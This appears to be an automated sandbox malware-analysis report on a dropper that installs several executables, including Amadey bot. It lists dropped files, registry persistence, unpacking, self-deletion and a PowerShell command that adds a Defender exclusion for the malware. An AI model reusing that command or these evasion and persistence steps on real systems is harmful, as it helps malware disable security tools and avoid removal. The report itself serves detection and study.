Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iwbavbe	Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /SpecialRun 4101d8 2812
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Process created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe 'C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe'
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /SpecialRun 4101d8 5256

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe	Code function: 25_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,		25_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe	Code function: 28_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,		28_2_00408FC9

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\9A4B.tmp

Jump to behavior

Source: 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp	Binary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
Source: 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp	Binary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));

Source: C:\Users\user\AppData\Local\Temp\69B.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe

Code function: 25_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,

25_2_004095FD

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:120:WilError_01

Source: 31F4.exe.6.dr, ??????????????/_?????xptkvqfesn.cs

Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Users\user\AppData\Local\Temp\69B.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5483.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\5483.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\69B.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\20BD.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: F7E3DjYJpC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: F7E3DjYJpC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: F7E3DjYJpC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: F7E3DjYJpC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: F7E3DjYJpC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: F7E3DjYJpC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: F7E3DjYJpC.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\vojos\fuw.pdb source: 20BD.exe, 00000014.00000002.863191806.0000000000417000.00000002.00020000.sdmp
Source:	Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 31F4.exe, 00000016.00000002.938495921.0000000003625000.00000004.00000001.sdmp, 31F4.exe, 0000001A.00000000.887030697.0000000000400000.00000040.00000001.sdmp, 31F4.exe, 00000024.00000000.938689458.0000000000400000.00000040.00000001.sdmp
Source:	Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000000.851564916.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001C.00000000.873666893.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001F.00000002.905961037.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000002.908653076.000000000040C000.00000002.00020000.sdmp
Source:	Binary string: c C:\rudiletama-43\bano.pdbp source: F7E3DjYJpC.exe, 00000000.00000002.687486155.0000000000401000.00000020.00020000.sdmp, F7E3DjYJpC.exe, 00000004.00000000.684695111.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000A.00000002.802540946.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000D.00000000.797241999.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000015.00000000.837811542.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000020.00000000.896222144.0000000000401000.00000020.00020000.sdmp
Source:	Binary string: C:\saxafunadu.pdb source: 9A4B.exe, 0000000B.00000002.794575212.0000000000401000.00000020.00020000.sdmp, 9A4B.exe, 0000000C.00000000.791428821.0000000000401000.00000020.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 20BD.exe, 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp
Source:	Binary string: wntdll.pdb source: 20BD.exe
Source:	Binary string: C:\rudiletama-43\bano.pdb source: F7E3DjYJpC.exe, 00000000.00000002.687486155.0000000000401000.00000020.00020000.sdmp, F7E3DjYJpC.exe, 00000004.00000000.684695111.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000A.00000002.802540946.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000D.00000000.797241999.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000015.00000000.837811542.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000020.00000000.896222144.0000000000401000.00000020.00020000.sdmp
Source:	Binary string: NC:\saxafunadu.pdb source: 9A4B.exe, 0000000B.00000002.794575212.0000000000401000.00000020.00020000.sdmp, 9A4B.exe, 0000000C.00000000.791428821.0000000000401000.00000020.00020000.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Unpacked PE file: 20.2.20BD.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cipizi:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Unpacked PE file: 24.2.46D6.exe.400000.0.unpack .text:ER;.data:W;.daya:W;.rsrc:R;.reloc:R; vs .text:EW;

.NET source code contains potential unpacker

Show sources

Source: 9415.exe.6.dr, SqlGeneratorForm.cs

.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00402E54 push eax; ret	20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00402E63 push eax; ret	20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00402665 push cs; ret	20_2_0040266B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_0040290C push eax; iretd	20_2_0040290D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00402E16 push eax; ret	20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00402DC0 push eax; ret	20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00402DD8 push eax; ret	20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00402DE8 push eax; ret	20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00402DF1 push eax; ret	20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00402E82 push eax; ret	20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00402E85 push eax; ret	20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00402D92 push eax; ret	20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00402E95 push eax; ret	20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00401D9A pushad ; ret	20_2_00401DA3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00402E9C push eax; ret	20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABBD0D1 push ecx; ret	20_2_6ABBD0E4
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_00B1CF50 push ss; ret	23_2_00B1CF51
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Code function: 24_2_02C328C4 push esp; iretd	24_2_02C328C5
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Code function: 24_2_02C31AB1 push ds; retf	24_2_02C31AB9
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Code function: 24_2_02C31614 push edx; iretd	24_2_02C31622
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Code function: 24_2_02C32728 push ds; retf	24_2_02C3272C
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe	Code function: 25_2_0040B550 push eax; ret	25_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe	Code function: 25_2_0040B550 push eax; ret	25_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe	Code function: 25_2_0040B50D push ecx; ret	25_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe	Code function: 28_2_0040B550 push eax; ret	28_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe	Code function: 28_2_0040B550 push eax; ret	28_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe	Code function: 28_2_0040B50D push ecx; ret	28_2_0040B51D

Source: C:\Users\user\Desktop\F7E3DjYJpC.exe

Code function: 0_2_00426900 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00426900

Source: 1254.exe.6.dr

Static PE information: 0x8B87D1F5 [Mon Mar 7 03:28:53 2044 UTC]

Source: 5483.exe.6.dr	Static PE information: section name: .ziwer
Source: 9A4B.exe.6.dr	Static PE information: section name: .lopaba
Source: 20BD.exe.6.dr	Static PE information: section name: .cipizi
Source: 16BC.exe.6.dr	Static PE information: section name: .nuwomux
Source: 46D6.exe.6.dr	Static PE information: section name: .daya
Source: 3D90.exe.6.dr	Static PE information: section name: .vinelog
Source: ssbavbe.6.dr	Static PE information: section name: .cipizi

Source: 2CF4.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x114b9d
Source: 69B.exe.6.dr	Static PE information: real checksum: 0x8ddc4 should be: 0x7fd66
Source: 3C84.exe.6.dr	Static PE information: real checksum: 0x2bdee should be: 0x3529c
Source: 9415.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x1e70bf
Source: 31F4.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xdd7bb

Source: initial sample	Static PE information: section name: .text entropy: 6.97839927821
Source: initial sample	Static PE information: section name: .text entropy: 7.87137605191
Source: initial sample	Static PE information: section name: .text entropy: 7.66469899227
Source: initial sample	Static PE information: section name: .text entropy: 7.67238292604
Source: initial sample	Static PE information: section name: .text entropy: 7.0016627071
Source: initial sample	Static PE information: section name: .text entropy: 7.38549549306
Source: initial sample	Static PE information: section name: .text entropy: 7.85713092672
Source: initial sample	Static PE information: section name: .text entropy: 7.83595599089
Source: initial sample	Static PE information: section name: .text entropy: 7.83351783168
Source: initial sample	Static PE information: section name: .text entropy: 6.98189062284
Source: initial sample	Static PE information: section name: .text entropy: 7.79655519179
Source: initial sample	Static PE information: section name: .text entropy: 6.97839927821
Source: initial sample	Static PE information: section name: .text entropy: 7.38549549306

Persistence and Installation Behavior:

Yara detected Amadey bot

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\iwbavbe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ssbavbe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\abbavbe	Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\69B.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\46D6.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3C84.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\69B.exe	File created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	File created: C:\Users\user\AppData\Local\Temp\1105.tmp	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9A4B.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9415.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3D90.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\iwbavbe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\39A7.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\abbavbe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ssbavbe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\5483.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5483.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\2CF4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	File created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\31F4.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\20BD.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\1254.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\16BC.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	File created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe

Code function: 25_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

25_2_00401306

Hooking and other Techniques for Hiding and Protection:

DLL reload attack detected

Show sources

Source: C:\Users\user\AppData\Local\Temp\20BD.exe

Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\1105.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL

Deletes itself after installation

Show sources

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\f7e3djyjpc.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\iwbavbe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe

Code function: 25_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

25_2_00408E31

Source: C:\Users\user\AppData\Local\Temp\69B.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
